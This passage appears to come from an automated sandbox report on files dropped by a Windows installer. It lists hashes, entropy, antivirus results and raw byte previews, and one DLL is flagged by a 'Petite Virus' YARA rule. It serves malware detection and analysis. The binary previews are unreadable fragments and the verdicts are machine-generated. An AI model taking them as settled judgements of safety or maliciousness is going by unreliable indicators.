                                                                                  Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:Unicode text, UTF-8 text
                                                                                  Category:dropped
                                                                                  Size (bytes):1059
                                                                                  Entropy (8bit):5.1208137218866945
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                  MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                  SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                  SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                  SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                  Malicious:false
                                                                                  Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):16910
                                                                                  Entropy (8bit):5.289608933932413
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                  MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                  SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                  SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                  SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):15374
                                                                                  Entropy (8bit):5.192037544202194
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                  MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                  SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                  SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                  SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197646
                                                                                  Entropy (8bit):6.1570532273946625
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                  MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                  SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                  SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                  SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):31936
                                                                                  Entropy (8bit):6.6461204214578
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                  MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                  SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                  SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                  SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197120
                                                                                  Entropy (8bit):6.423554884287906
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                  MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                  SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                  SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                  SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):115712
                                                                                  Entropy (8bit):6.401537154757194
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                  MD5:840D631DA54C308B23590AD6366EBA77
                                                                                  SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                  SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                  SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):62478
                                                                                  Entropy (8bit):6.063363187934607
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                  MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                  SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                  SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                  SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):26126
                                                                                  Entropy (8bit):6.048294343792499
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                  MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                  SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                  SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                  SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):648384
                                                                                  Entropy (8bit):6.666474522542094
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                                  MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                                  SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                                  SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                                  SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):62478
                                                                                  Entropy (8bit):6.063363187934607
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                  MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                  SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                  SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                  SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):906766
                                                                                  Entropy (8bit):6.450201653594769
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
                                                                                  MD5:AF785965AB0BF2474B3DD6E53DA2F368
                                                                                  SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
                                                                                  SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
                                                                                  SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..|;.......<..................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36416
                                                                                  Entropy (8bit):7.842278356440954
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                                  MD5:BEBA64522AA8265751187E38D1FC0653
                                                                                  SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                                  SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                                  SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):8456
                                                                                  Entropy (8bit):6.767152008521429
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                                  MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                                  SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                                  SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                                  SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68042
                                                                                  Entropy (8bit):6.090396152400884
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                  MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                  SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                  SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                  SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):26526
                                                                                  Entropy (8bit):4.600837395607617
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                  MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                  SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                  SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                  SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                  Malicious:false
                                                                                  Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):17472
                                                                                  Entropy (8bit):7.524548435291935
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                                  MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                                  SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                                  SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                                  SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........|...CC.......p......n....<.......`..............lH......)...............
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):315918
                                                                                  Entropy (8bit):6.5736483262229735
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                                  MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                                  SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                                  SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                                  SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68876
                                                                                  Entropy (8bit):7.922125376804506
                                                                                  Encrypted:false
